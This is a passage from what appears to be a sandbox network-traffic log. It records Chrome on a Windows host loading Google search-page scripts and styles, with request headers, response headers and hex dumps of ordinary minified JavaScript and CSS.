2024-12-12 21:40:35 UTC	534	IN	Data Raw: 28 62 3d 79 6d 62 28 74 68 69 73 2c 61 2c 62 2c 63 29 2c 61 3d 6e 65 77 20 5f 2e 24 68 62 28 61 2c 62 2c 32 29 29 3a 61 3d 5f 2e 64 69 62 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 76 61 72 20 79 6d 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 72 65 74 75 72 6e 20 63 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 77 6d 62 29 69 66 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 5a 66 29 7b 69 66 28 21 65 2e 73 74 61 74 75 73 7c 7c 21 64 2e 4d 62 61 28 65 2e 73 74 61 74 75 73 2e 58 6f 28 29 29 29 74 68 72 6f 77 20 65 3b 7d 65 6c 73 65 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 5f 2e 62 73 26 26 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 Data Ascii: (b=ymb(this,a,b,c),a=new _.$hb(a,b,2)):a=_.dib(a);return a};var ymb=function(a,b,c,d){return c.then(function(e){return e},function(e){if(wmb)if(e instanceof _.Zf){if(!e.status\|\|!d.Mba(e.status.Xo()))throw e;}else{if("function"==typeof _.bs&&e instanceof

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49797	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:35 UTC	1446	OUT	POST /gen_204?atyp=csi&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&s=promo&rt=hpbas.10228&zx=1734039627405&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=WEzy2GnTVCwd42wvY6cLz11ymcwUARJq0b8yzb-puulQFCcfrMH7cT_brk7HuA4AZKTjaQ3xhalkcNI12rZC3Rfa0rEgjsWoNZAPZW14aRoLTUNgtFCL9TgpV_3_L1wXS4addnHRJpNLLsgPhASys3Q-3WsTx-w7d9ZKvWN9U4jyHfIQy4Ue0Gc1SnRxOl06n3lUikj73ARjQvUjpGU
2024-12-12 21:40:36 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-ClL1dzya9FiifgHZLgx3sg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 12 Dec 2024 21:40:36 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49800	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:35 UTC	1536	OUT	GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/ck=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCBAB2AQIEAAAAAMAAAAgCEAQBAEIAAhCAFQAAwgFQBgBAAQABCAXgUabACjABBGQAgBKAxJ75AaBABAACAAKAAWTQEIgKQCgABAACQAIAAAgAAAAYEkAgAEAHQAAYACIBABA9CAAAAAAgCEDAnQCwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/ujg=1/rs=ACT90oHfkAOiN8D6dktf_Sl5r3y4r4Hiog/m=NzU6V,syyx,sygo,zGLm3b,syvy,syvz,syvp,DhPYme,syy3,syxy,syy1,syy0,sywi,sywj,syxz,syxw,syxx,KHourd,MpJwZc,UUJqVe,sy7o,sOXFj,sy7n,s39S4,oGtAuc,NTMZac,nAFL3,sy81,sy80,q0xTif,y05UD,sy12k,sy192,sy18w,syx4,sy18p,syx3,syx2,syx1,sy18v,sy13u,sy18m,sy13y,sy18u,sy12g,sy18q,syh2,sy13z,sy18x,sy126,sy18t,sy18r,sy18s,sy18z,sy18h,sy18n,sy18g,sy18l,sy18i,sy18d,sy14u,sy141,sy142,syx9,syxa,epYOx?xjs=s3 HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
2024-12-12 21:40:36 UTC	826	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 118881 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 12 Dec 2024 21:40:26 GMT Expires: Fri, 12 Dec 2025 21:40:26 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 12 Dec 2024 17:02:52 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 9 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:36 UTC	564	IN	Data Raw: 5f 46 5f 69 6e 73 74 61 6c 6c 43 73 73 28 22 63 2d 77 69 7a 7b 63 6f 6e 74 61 69 6e 3a 73 74 79 6c 65 7d 63 2d 77 69 7a 3e 63 2d 64 61 74 61 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 63 2d 77 69 7a 2e 72 45 54 53 44 7b 63 6f 6e 74 61 69 6e 3a 6e 6f 6e 65 7d 63 2d 77 69 7a 2e 55 62 69 38 5a 7b 63 6f 6e 74 61 69 6e 3a 6c 61 79 6f 75 74 20 73 74 79 6c 65 7d 2e 65 61 30 4c 62 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 34 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 70 78 20 34 70 78 20 36 70 78 20 72 67 62 61 28 33 32 2c 33 33 2c 33 36 2c 30 2e 32 38 29 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f Data Ascii: _F_installCss("c-wiz{contain:style}c-wiz>c-data{display:none}c-wiz.rETSD{contain:none}c-wiz.Ubi8Z{contain:layout style}.ea0Lbe{background:#fff;border-radius:24px;box-shadow:0px 4px 6px rgba(32,33,36,0.28);margin-left:-4px;margin-top:0;position:absolute;to
2024-12-12 21:40:36 UTC	1390	IN	Data Raw: 69 6e 3a 30 20 30 20 31 34 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 2e 31 70 78 7d 2e 42 48 39 72 6e 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 6e 6f 72 6d 61 6c 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 36 70 78 7d 2e 67 49 59 4a 55 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 28 32 34 38 2c 32 34 39 2c 32 35 30 29 3b 62 6f 72 64 65 72 3a 31 70 78 20 64 61 73 68 65 64 20 23 63 30 63 30 63 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 69 7a 69 Data Ascii: in:0 0 14px;text-align:center;letter-spacing:.1px}.BH9rn{align-items:center;display:inline-flex;flex-direction:row;flex-grow:1;justify-content:normal;padding-top:16px}.gIYJUc{background:rgb(248,249,250);border:1px dashed #c0c0c0;border-radius:8px;box-sizi
2024-12-12 21:40:36 UTC	1390	IN	Data Raw: 2d 74 6f 70 3a 31 32 70 78 7d 2e 44 56 37 74 68 65 7b 63 6f 6c 6f 72 3a 72 67 62 28 32 35 2c 31 30 33 2c 32 31 30 29 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 44 56 37 74 68 65 2e 52 69 45 43 66 66 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 2e 44 56 37 74 68 65 3a 68 6f 76 65 72 2c 2e 44 56 37 74 68 65 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 44 56 37 74 68 65 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 41 72 49 41 58 62 7b 66 69 6c 6c 3a 72 67 62 28 32 34 31 2c 32 34 33 2c 32 34 34 29 7d 2e 71 4f 46 4c 73 62 7b 66 69 6c 6c 3a 72 67 62 28 32 31 38 2c 32 32 Data Ascii: -top:12px}.DV7the{color:rgb(25,103,210);cursor:pointer;white-space:nowrap}.DV7the.RiECff:focus{outline:none}.DV7the:hover,.DV7the:hover{text-decoration:underline}.DV7the:focus{text-decoration:underline}.ArIAXb{fill:rgb(241,243,244)}.qOFLsb{fill:rgb(218,22
2024-12-12 21:40:36 UTC	1390	IN	Data Raw: 38 2c 32 32 30 2c 32 32 34 29 3b 63 6f 6c 6f 72 3a 72 67 62 28 32 36 2c 31 31 35 2c 32 33 32 29 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 5c 22 47 6f 6f 67 6c 65 20 53 61 6e 73 5c 22 2c 52 6f 62 6f 74 6f 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 2e 32 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 3b 6f 75 74 6c 69 6e 65 3a 30 3b 70 61 64 64 69 6e 67 3a 38 70 78 20 32 34 70 78 7d 2e 51 77 62 64 33 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 Data Ascii: 8,220,224);color:rgb(26,115,232);cursor:pointer;display:inline-flex;flex-shrink:0;font-family:\"Google Sans\",Roboto,Arial,sans-serif;font-size:14px;justify-content:center;letter-spacing:.25px;margin-left:8px;outline:0;padding:8px 24px}.Qwbd3:hover{backgr
2024-12-12 21:40:36 UTC	1390	IN	Data Raw: 22 7a 47 4c 6d 33 62 22 2c 5b 5d 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 56 4c 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 44 28 61 2c 33 34 29 7d 3b 5f 2e 57 4c 62 3d 21 21 28 5f 2e 42 68 5b 31 32 5d 3e 3e 31 37 26 31 29 3b 5f 2e 49 76 3d 21 21 28 5f 2e 42 68 5b 31 32 5d 3e 3e 31 39 26 31 29 3b 5f 2e 4a 76 3d 21 21 28 5f 2e 42 68 5b 31 32 5d 3e 3e 32 30 26 31 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 79 28 22 7a 47 4c 6d 33 62 22 29 3b 0a 76 61 72 20 44 4e 63 3d 21 21 28 5f 2e 42 68 5b 31 31 5d 3e 3e 31 35 26 31 29 3b 76 61 72 20 45 4e 63 3d 6e 65 77 20 5f 2e 79 6e 2c Data Ascii: "zGLm3b",[]);}catch(e){_._DumpException(e)}try{_.VLb=function(a){return _.D(a,34)};_.WLb=!!(_.Bh[12]>>17&1);_.Iv=!!(_.Bh[12]>>19&1);_.Jv=!!(_.Bh[12]>>20&1);}catch(e){_._DumpException(e)}try{_.y("zGLm3b");var DNc=!!(_.Bh[11]>>15&1);var ENc=new _.yn,
2024-12-12 21:40:36 UTC	1390	IN	Data Raw: 3d 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 26 26 28 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 6d 6f 74 69 6f 6e 29 22 29 2e 6d 61 74 63 68 65 73 7c 7c 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 6d 6f 74 69 6f 6e 3a 20 72 65 64 75 63 65 29 22 29 2e 6d 61 74 63 68 65 73 29 3f 22 31 22 3a 22 30 22 3b 74 68 69 73 2e 6f 61 3d 61 2e 67 65 74 44 61 74 61 28 22 70 72 6d 22 29 2e 46 62 28 29 3f 22 31 22 3a 22 30 22 7d 3b 48 4e 63 2e 70 72 6f 74 6f 74 79 70 65 2e 68 50 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 22 70 72 6d 32 33 22 2c 74 68 69 73 2e 6b 61 5d 7d 3b 48 4e 63 2e 70 72 6f 74 6f 74 79 70 65 2e 6d Data Ascii: =window.matchMedia&&(window.matchMedia("(prefers-reduced-motion)").matches\|\|window.matchMedia("(prefers-reduced-motion: reduce)").matches)?"1":"0";this.oa=a.getData("prm").Fb()?"1":"0"};HNc.prototype.hPb=function(){return["prm23",this.ka]};HNc.prototype.m
2024-12-12 21:40:36 UTC	1390	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 61 26 26 74 68 69 73 2e 6f 61 26 26 74 68 69 73 2e 51 61 2e 70 75 73 68 28 74 68 69 73 2e 6f 61 2e 6c 69 73 74 65 6e 28 61 2c 62 2c 63 2c 64 3d 3d 3d 76 6f 69 64 20 30 3f 21 31 3a 64 2c 65 29 29 7d 3b 5f 2e 4a 73 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 61 2e 6f 61 26 26 61 2e 68 62 2e 70 75 73 68 28 49 73 63 28 62 2c 63 29 29 7d 3b 5f 2e 6d 7a 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 21 31 3a 65 3b 69 66 28 61 2e 4d 61 5b 64 5d 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 3b 28 65 3d 61 2e 4d 61 5b 64 5d 29 26 26 5f 2e 63 61 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 29 7d 61 2e 4d 61 5b 64 5d 3d 49 73 63 28 62 2c 63 29 7d Data Ascii: function(a,b,c,d,e){a&&this.oa&&this.Qa.push(this.oa.listen(a,b,c,d===void 0?!1:d,e))};_.Jsc=function(a,b,c){a.oa&&a.hb.push(Isc(b,c))};_.mz=function(a,b,c,d,e){e=e===void 0?!1:e;if(a.Ma[d]){if(!e)return;(e=a.Ma[d])&&_.ca.clearTimeout(e)}a.Ma[d]=Isc(b,c)}
2024-12-12 21:40:36 UTC	1390	IN	Data Raw: 74 6f 74 79 70 65 2e 63 6c 6f 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4e 73 63 28 74 68 69 73 2e 6c 65 66 74 2c 74 68 69 73 2e 74 6f 70 2c 74 68 69 73 2e 77 69 64 74 68 2c 74 68 69 73 2e 68 65 69 67 68 74 29 7d 3b 5f 2e 50 73 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 77 69 64 74 68 3d 3d 30 26 26 61 2e 68 65 69 67 68 74 3d 3d 30 7d 3b 0a 5f 2e 51 73 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 21 62 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 63 3d 4d 61 74 68 2e 6d 61 78 28 61 2e 6c 65 66 74 2c 62 2e 6c 65 66 74 29 2c 64 3d 4d 61 74 68 2e 6d 69 6e 28 61 2e 6c 65 66 74 2b 61 2e 77 69 64 74 68 2c 62 2e 6c 65 66 74 2b 62 2e 77 69 64 74 68 29 3b 72 65 74 75 72 6e 20 4d 61 74 68 2e Data Ascii: totype.clone=function(){return new _.Nsc(this.left,this.top,this.width,this.height)};_.Psc=function(a){return a.width==0&&a.height==0};_.Qsc=function(a,b){if(!b)return!1;var c=Math.max(a.left,b.left),d=Math.min(a.left+a.width,b.left+b.width);return Math.
2024-12-12 21:40:36 UTC	1390	IN	Data Raw: 28 66 2c 62 29 3b 62 72 65 61 6b 7d 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 5f 2e 43 6d 28 61 2c 62 2c 63 2c 64 2c 65 29 7d 7d 3b 5f 2e 6f 7a 2e 70 72 6f 74 6f 74 79 70 65 2e 4d 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 75 6e 6c 69 73 74 65 6e 28 61 2e 73 72 63 2c 61 2e 74 79 70 65 2c 61 2e 6c 69 73 74 65 6e 65 72 2c 61 2e 63 61 70 74 75 72 65 2c 61 2e 68 61 6e 64 6c 65 72 29 7d 3b 76 61 72 20 49 73 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 62 3d 3d 3d 30 3f 28 5f 2e 63 61 2e 73 65 74 54 69 6d 65 6f 75 74 28 61 2c 30 29 2c 30 29 3a 5f 2e 63 61 2e 73 65 74 54 69 6d 65 6f 75 74 28 61 2c 62 29 7d 3b 0a 5f 2e 6f 7a 2e 70 72 6f 74 6f 74 79 70 65 2e 57 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6c 69 73 74 Data Ascii: (f,b);break}break;default:_.Cm(a,b,c,d,e)}};_.oz.prototype.Ml=function(a){this.unlisten(a.src,a.type,a.listener,a.capture,a.handler)};var Isc=function(a,b){return b===0?(_.ca.setTimeout(a,0),0):_.ca.setTimeout(a,b)};_.oz.prototype.Wf=function(){this.list
2024-12-12 21:40:36 UTC	1390	IN	Data Raw: 7d 3b 59 73 63 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 45 6d 70 74 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 61 2e 6c 65 6e 67 74 68 2b 74 68 69 73 2e 42 61 3d 3d 30 7d 3b 0a 59 73 63 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 77 61 28 74 68 69 73 2e 6f 61 29 3b 69 66 28 21 62 29 7b 66 6f 72 28 62 3d 74 68 69 73 2e 6f 61 2e 6c 65 6e 67 74 68 3b 62 3e 30 26 26 21 28 61 2e 6b 61 3e 3d 74 68 69 73 2e 6f 61 5b 62 2d 31 5d 2e 6b 61 29 3b 62 2d 2d 29 74 68 69 73 2e 6f 61 5b 62 5d 3d 74 68 69 73 2e 6f 61 5b 62 2d 31 5d 3b 74 68 69 73 2e 6f 61 5b 62 5d 3d 61 3b 62 3d 62 3d 3d 30 7c 7c 62 3c 74 68 69 73 2e 6f 61 2e 6c 65 6e 67 74 68 2d 31 7d 69 66 28 62 Data Ascii: };Ysc.prototype.isEmpty=function(){return this.oa.length+this.Ba==0};Ysc.prototype.addEvent=function(a){var b=a.wa(this.oa);if(!b){for(b=this.oa.length;b>0&&!(a.ka>=this.oa[b-1].ka);b--)this.oa[b]=this.oa[b-1];this.oa[b]=a;b=b==0\|\|b<this.oa.length-1}if(b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49799	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:35 UTC	2253	OUT	GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/ck=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCBAB2AQIEAAAAAMAAAAgCEAQBAEIAAhCAFQAAwgFQBgBAAQABCAXgUabACjABBGQAgBKAxJ75AaBABAACAAKAAWTQEIgKQCgABAACQAIAAAgAAAAYEkAgAEAHQAAYACIBABA9CAAAAAAgCEDAnQCwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/ujg=1/rs=ACT90oHfkAOiN8D6dktf_Sl5r3y4r4Hiog/m=sb_wiz,aa,abd,sy17o,syfz,syfr,syfp,syfq,syfs,syg0,syg1,syfw,syfv,syfu,syep,syft,syfj,syfi,syfk,syfh,syfm,sy16j,sygb,sy17m,syyl,syga,syg9,syg8,async,ifl,pHXghd,sf,syig,sy3kp,sonic,sy3kv,syhl,syh1,sy3k7,sy3ka,sy274,sye3,sy9u,sy9f,sy9e,sy9c,spch,syti,syth,rtH1bd,sy19k,sy15l,sy151,sy12b,sydb,sy19i,SMquOb,sy7k,sy7j,syf3,syfe,syfc,syfb,syf2,syf0,syey,sy86,sy83,sy85,syex,syf1,syew,sybg,syb9,sybc,syaj,syap,syai,syah,syag,sya4,syba,syax,syay,syb4,syan,syb3,syaw,syat,syae,syal,syaz,sya6,sya8,sya9,sya5,syao,syad,syaa,sybj,sya0,sy9x,sybi,sy9p,sy9h,sy9k,sy9w,sya3,syb0,syev,syeu,syer,syeq,sy89,uxMpU,syem,sybq,s [TRUNCATED] Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
2024-12-12 21:40:36 UTC	826	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 380831 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 12 Dec 2024 21:40:26 GMT Expires: Fri, 12 Dec 2025 21:40:26 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 12 Dec 2024 17:02:52 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 9 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:36 UTC	564	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 79 28 22 73 62 5f 77 69 7a 22 29 3b 0a 0a 5f 2e 7a 28 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 79 28 22 61 61 22 29 3b 0a 0a 5f 2e 7a 28 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 79 28 22 61 62 64 22 29 3b 0a 76 61 72 20 50 66 69 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 22 22 2c 63 3d 32 31 2c 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 64 25 34 21 3d 33 26 26 28 62 2b 3d 53 74 72 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{_.y("sb_wiz");_.z();}catch(e){_._DumpException(e)}try{_.y("aa");_.z();}catch(e){_._DumpException(e)}try{_.y("abd");var Pfi=function(a){for(var b="",c=21,d=0;d<a.length;d++)d%4!=3&&(b+=Str
